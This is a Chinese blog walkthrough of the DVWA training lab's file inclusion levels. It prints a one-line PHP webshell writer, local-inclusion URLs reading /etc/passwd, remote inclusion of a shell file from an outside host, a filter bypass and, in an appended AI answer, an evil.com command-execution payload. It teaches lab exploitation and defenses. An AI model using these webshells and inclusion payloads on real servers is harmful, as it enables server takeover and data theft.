dvwa File Inclusion(文件包含) 低中高各个级别介绍及破解过程

最新推荐文章于 2024-11-27 19:00:14 发布
最新推荐文章于 2024-11-27 19:00:14 发布
阅读量1.1k 收藏 3
点赞数
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44286136/article/details/110201976
版权

本地文件包含

File Inclusion,意思是文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞,远程文件包含漏洞是因为开启了php配置中的allow_url_fopen选项(选项开启之后,服务器允许包含一个远程的文件)

low

php核心代码

<?php
    $file = $_GET['page']; //The page we wish to display 
?>

服务器端对page参数没有做任何的过滤跟检查

本地文件包含+webshell

http://192.168.0.8/dvwa/vulnerabilities/fi/?page=/etc/passwd 类似
在这里插入图片描述
当被包含的文件在服务器本地时候,形成本地包含
1.制作一句话木马 1234.jpg 推荐软件 edjpgcom

<?fputs(fopen("shell.php","w"),'<?php eval($_POST[admin]);?>')?>

在这里插入图片描述

2.上传图片木马文件
将图片上产到本地系统中,但是图片的webshell并没有执行,要制作webshell,所以要执行图片包含的木马程序,生成后门,在文件包含的访问页面下,访问图片

3.执行文件包含 并产生后门
在这里插入图片描述

4.通过菜刀连接
在这里插入图片描述
在这里插入图片描述

远程文件包含+webshell

服务器上开启aparch 上传一个txt,文件在 http://47.99.168.126/1.txt
内容

fputs(fopen(shell.php,w),'php eval($_POST[admin]);')

然后在dvwa后面加上这个路径,执行一下即可
http://192.168.0.8/dvwa/vulnerabilities/fi/?page=http://47.99.168.126/1.txt

medium

php核心代码

<?php
    $file = $_GET['page']; // The page we wish to display 
    // Bad input validation
    $file = str_replace("http://", "", $file);
    $file = str_replace("https://", "", $file);        
?>

Medium级别的代码增加了str_replace函数,对page参数进行了一定的处理,将”http:// ”、”https://”替换为空字符,即删除
使用str_replace函数是极其不安全的,因为可以使用双写绕过替换规则
1.本地文件包含
不受影响
2.远程文件包含 双写http://绕过
http://192.168.0.8/dvwa/vulnerabilities/fi/?page=hthttp:// tp://47.99.168.126/1.txt

high

php核心代码

<?php    
    $file = $_GET['page']; //The page we wish to display 
    // Only allow include.php
    if ( $file != "include.php" ) {
        echo "ERROR: File not found!";
        exit;
    }   
?>

high级别的代码使用了白名单机制进行防护,简单粗暴,page参数必须为“include.php”,彻底杜绝了文件包含漏洞。

DVWA靶场File Inclusion (文件包含) 漏洞low(),medium(中等),high(),impossible(不可能的)所有级别通关教程及源码分析
m0_74786138的博客
12-30 613
文件包含漏洞(File Inclusion Vulnerability)是一种常见的网络安全漏洞,主要出现在应用程序中不安全地处理文件路径时。攻击者可以利用此漏洞执行恶意文件,或者访问不该被访问的文件。访问:http://127.0.0.1/DVWA/vulnerabilities/fi/?/phpinfo.php**发现没有回显,可以确定是被过滤了。要求了参数必须以file开头,即**?** ,否则就会报错。替换为了**’ '** ,可以利用双写绕过过滤。访问**file4.php,**依然可以访问。
DVWA系列之File Inclusion(文件包含)源码分析及漏洞利用
7Riven's blog
11-27 1401
什么是文件包含? 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含文件包含漏洞的成因 随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变 量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校验或者校验被绕过...
DVWA-File Inclusion文件包含
Cwillchris的博客
10-28 2549
实验环境: DVWA靶机:172.16.12.10 windos攻击机:172.16.12.7 kali攻击机:172.16.12.30 实验步骤: FileInclusion,意思是文件包含(漏洞),是指当服务器开启 allow_url_include选项时,就可以通过php的某些特性函数(include(), require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。.
DVWA —— File Inclusion 文件包含
YouTheFreedom的博客
05-22 2073
web 程序中引入一段用户能控制的脚本或代码,并让服务器端执行 include() 等函数通过动态变量的方式引入需要包含的文件,用户能够控制该动态变量,实现本地文件包含或者远程文件包含
DVWA系列File Inclusion
crystal919的博客
03-26 342
File Inclusion,意思是文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞,远程...
DVWA学习之File Inclusion文件包含漏洞)
weixin_40950781的博客
08-18 2591
DVWA学习之File InclusionFile Inclusion文件包含)0x01 何为File Inclusion?1.简介2.相关函数3.文件包含功能4.相关知识5.文件包含漏洞的一般特征6.文件包含的测试0x02 low级别0x02 medium级别0x03 high级别0x04 impossible级别0x05 文件包含漏洞的利用0x06 防御方法 File Inclusion(文...
漏洞复现篇——文件包含漏洞(DVWA靶场---File Inclusion中高级绕过】)
爱国小白帽
02-19 4093
实验环境: PHPstudy DVWA靶场 菜刀 环境搭建 1、将DVWA Security級別换成low 2、打开php的配置文件,搜索allow_url_include,把off换成on,然后重启 模拟实验 本地文件包含(LFI) 1、点击File Inclusion中的file1.php 2、在图示位置输入C:\Windows\System32\drivers\etc\hosts...
DVWA】15. File Inclusion文件包含(xampp版PHP报错解决+Low+Medium)
Zichel77的博客
01-10 1167
存在服务器文件包含漏洞时无论文件后缀是否是php,均当做php文件来执行。当服务器的php配置中,allow_url_fopen和allow_url_include打开时,服务器会允许包含远程服务器上的文件。页面返回了报错,但同时也暴露了页面的地址D:\xampp\htdocs\dvwa\vulnerabilities\fi\index.php。以上的限制其实主要针对的是远程文件的读取,因此本地文件的读取依然不受限制。如果要破解对远程文件的限制,我们对http://进行改写即可,以下为例子。
Dvwa练习04 File Inclusion文件包含
coco3105的博客
02-09 1360
本地文件包含,远程文件包含,文件读取及代码执行
DVWAFile Inclusion
Sukiugg的博客
07-28 280
1. url改为: http://192.168.131.148/dvwa/vulnerabilities/fi/?page=/etc/passwd
DVWA-----------File Inclusion
haha1314的博客
05-19 484
文件包含漏洞 开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程文件包含; 开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞;在PHP中经常出现文件包含漏洞; 常用函数 include():找不到被包含文件,报错,但会继续运行脚本; include_once():...
DVWA练习之File Inclusion
dz919908651的博客
08-22 1429
DVWA练习之File Inclusion 本博客将记录在web安全问题中一种常见的漏洞——“文件包含”漏洞的实践演练。首先阐述文件漏洞的概念,原理,最后展示基于DVWA的各种等级的文件包含漏洞。 文件包含 概念:指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数,利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任...
DVWA中的File Inclusion(文件包含)
hwy2506451901的博客
04-04 515
最近课上用到了DVWA,通过学习总结了文件包含部分的内容,以下是个人的总结,因为刚刚入门 所以写的比较详细,希望对刚学习这一部分的朋友们有所帮助。 **原理:**PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 **类型:**本地文件包含,远程文件包含(相对较容易) **提示:**...
DVWA靶场——File Inclusion
sucker的博客
11-27 1704
例如,常见的file://协议用于读取本地文件,而php://协议则是PHP特有的协议,用于访问PHP内部流或执行某些特定操作。:许多服务器会在 PHP 配置中禁用文件包含功能,或者启用了 open_basedir、safe_mode 等安全设置,限制了包含文件的路径和范围,从而减少了攻击者通过 LFI 漏洞访问系统文件的能力。经过前面的测试知道存在文件包含漏洞,那么还可以测试有无远程文件包含,思路就是通过远程文件包含从攻击者搭建的服务器下载恶意的木马文件,以获取该网站的webshell。
DVWA靶场系列(三)—— File Inclusion文件包含
qq_45612828的博客
07-12 1222
DVWA靶场系列(三)—— File Inclusion文件包含
java实现对txt文件读入,替换部分文字后写出到另一个文件
nkymxx123456的博客
06-14 1771
package com; import java.io.*; public class test { public static void Test(String oldfilePath,String newfilePath){ File file = new File(oldfilePath); //判断文件存在并且是文件 Boolean boo = file.exists()&&file.isFile(); System.out.println(boo);
DVWA中文件上传漏洞(中高
liudacanzn的博客
08-03 298
DVWA中文件上传漏洞 级 准备工具 1.小刀 2.中国菜刀 3.DVWA 开始刀了 上传小刀 合成刀在服务器的上传位置 http://xxx.xxx.xxx.xxx/dvwa/hackable/uploads/chopper.php 上菜刀 成功上菜(文件太大了)
DVWA文件包含漏洞-(中、高绕过)
weixin_51706044的博客
05-23 743
文章目录一、DVWA SecurityMedium級別二、High Security Level 一、DVWA SecurityMedium級別 设置好难度后,查看源码: 通过对代码分析可以发现这里过滤了一些东西,即是array里面的因此我们需要进行绕过 绕过方法 使用绝对路径或相对路径进行绕过,在这里与级别中路径一致 http://localhost/DVWA-master/vulnerabilities/fi/?page=/etc/passwd 使用的是 str_replace() 函数,
DVWA 文件包含File Inclusion
moonlightsunshin的博客
05-18 298
执行后会写入一个shell.php的后门代码通过前面我们利用报错得到路径。源码分析对我们传入的参数进行了file限制我们文件路径头必须是file。,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的文件时,用。llow_url_fopen和allow_url_include为ON。开发人员一般希望代码更灵活,所以将被包含的文件。对http://和../,..\有过滤直接用双写绕过就行。服务端又没有做合理的校检或者校检被绕过。则可能存在远程文件包含漏洞。就造成了文件包含漏洞。
DVWA靶场文件包含漏洞(File Inclusion)远程文件
最新发布
04-03
<think>好的,我现在需要处理用户关于DVWA靶场中文件包含漏洞的远程利用和防御方法的问题。首先,我需要回忆文件包含漏洞的基本知识,特别是远程文件包含(RFI)的部分。根据用户提供的引用资料,特别是引用[3]和[4],远程文件包含需要allow_url_include配置开启,而DVWA的高级别可能已经关闭了这个选项。 接下来,用户想知道远程利用的方法。根据引用[4],当allow_url_include开启时,攻击者可以通过包含远程服务器上的恶意文件来执行代码。例如,使用http://或ftp://协议引入外部脚本。但需要注意,在DVWA的高级别设置中,可能已经对文件路径做了限制,比如必须以file://开头,如引用[5]提到的,这时候可能需要使用file://伪协议,但这是本地包含而非远程。 然后,关于防御方法,引用[1]提到使用绝对路径和避免动态包含,引用[2]和[3]讨论了白名单验证和关闭危险配置。需要综合这些信息,给出具体的修复建议,如输入验证、禁用远程包含等。 在生成相关问题的时候,要涵盖漏洞原理、利用条件、防御措施以及与其他漏洞的区别,确保问题全面。同时要检查引用标注是否正确,每个引用对应的内容是否准确。例如,引用[5]提到High级别使用file://开头,这可能影响远程包含的可能性,需要指出远程包含的条件是否满足。 最后,确保回答结构清晰,分点说明利用方式和防御方法,并正确引用相关来源。同时,验证LaTeX格式是否正确,但根据用户的问题,可能不需要数学公式,但如果有涉及变量或路径的地方,要使用$...$格式。例如,路径参数可以写成$_GET['page']$这样的形式。 总结步骤:1. 解释远程利用的条件和方法,引用相关材料;2. 列出防御措施,结合多个引用中的建议;3. 生成相关问题,覆盖漏洞的各个方面。</think>### DVWA 文件包含漏洞(File Inclusion)远程利用及防御方法 #### 一、远程文件包含(RFI)利用方式 1. **利用条件** - PHP配置中需开启 `allow_url_include=On`(默认关闭,需手动修改`php.ini`)[^4]。 - 目标代码中存在动态包含用户可控参数的漏洞,例如 `include($_GET['page']);`。 2. **攻击步骤** - **构造恶意文件**:在远程服务器(如攻击者控制的站点)存放包含恶意代码的文件,例如 `http://evil.com/shell.txt`,内容为 `<?php system($_GET['cmd']);?>`。 - **触发包含**:通过URL参数注入远程文件路径,例如: ``` http://dvwa/vulnerabilities/fi/?page=http://evil.com/shell.txt&cmd=id ``` 若配置允许远程包含,服务器会加载并执行远程文件中的代码,实现命令注入[^4]。 3. **绕过限制** - 若High级别限制路径以`file://`开头(如DVWA的High级别),可通过伪协议`file://`结合路径遍历尝试本地文件包含(LFI),例如: ``` page=file:///var/www/html/config.php ``` 但此方式属于本地包含,非严格意义的远程利用[^5]。 --- #### 二、防御方法 1. **输入验证与白名单** - 对用户输入的包含路径进行严格校验,仅允许预定义的合法文件名(如`home.php`、`about.php`),拒绝包含外部路径或协议[^2][^1]。 2. **禁用危险配置** - 关闭PHP的远程文件包含功能:在`php.ini`中设置 `allow_url_include=Off` 和 `allow_url_fopen=Off`[^4]。 3. **使用绝对路径** - 避免动态拼接路径,改用硬编码的绝对路径,例如: ```php $allowed_pages = ['home' => '/var/www/html/home.php']; if (isset($_GET['page']) && array_key_exists($_GET['page'], $allowed_pages)) { include($allowed_pages[$_GET['page']]); } ``` 此方法彻底消除路径遍历风险。 4. **文件后缀限制** - 强制添加固定后缀(如`.php`),防止包含非预期文件类型: ```php $page = $_GET['page'] . '.php'; ``` 5. **代码隔离** - 将可包含文件存放在Web根目录外,避免通过URL直接访问敏感文件[^3]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值